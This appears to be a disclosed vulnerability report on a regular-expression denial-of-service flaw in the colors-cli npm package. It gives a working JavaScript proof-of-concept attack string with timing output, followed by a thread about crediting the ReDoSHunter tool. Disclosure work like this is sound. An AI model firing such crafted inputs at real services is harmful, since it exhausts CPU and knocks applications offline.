Inefficient Regular Expression Complexity in jaywcjlove/colors-cli
Reported on
Sep 11th 2021
✍️ Description
The colors-cli
package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted input to the ansi-regex functionality may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex. The ReDOS is mainly due to the sub-patterns [\#;?]* and (?:;[a-zA-Z\d])
🕵️♂️ Proof of Concept
// PoC.js
var color = require('colors-cli/safe')
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
color.red(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
Check the output:
attack_str.length: 10002: 1132 ms
attack_str.length: 20002: 4162 ms
attack_str.length: 30002: 9244 ms
attack_str.length: 40002: 17362 ms
attack_str.length: 50002: 28197 ms
attack_str.length: 60002: 39578 ms
--
--
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, it should take 0-10 milliseconds.
Occurrences
SECURITY.md
a year ago
@jaywcjlove Thank you for your time and confirmation.
@YetingLi I am following your work from long time. I am a fan of your work. Yeah using the publicly available exploit of your code to do other POC's which were not reported yet.
@yetingli I am also using your tool https://github.com/yetingli/ReDoSHunter to generate "Attack String".
Sorry, I don't know that I need permission to use a POC/Patch/tool that is publicly available. I thought like if an issue is public we can use that without any permissions.
I am using your pattern to find REDOS vulnerabilities and also providing patches in GitHub for a long time.
I'm glad you can pay attention to my work and tools. I hope you can mention it next time you use my tool.
I'm glad you can pay attention to my work and tools. I hope you can cite it next time you use my tool.
@yetingli Yeah sure I will credit you as well whenever I found an issue using your tools/pattern. Thanks for understanding.
@yetingli By the way, I reported many issues today by following your tool/pattern. Thanks for such a useful tool.
@ready-research Okay, the reported issues should explictly acknowledge our work when submitting.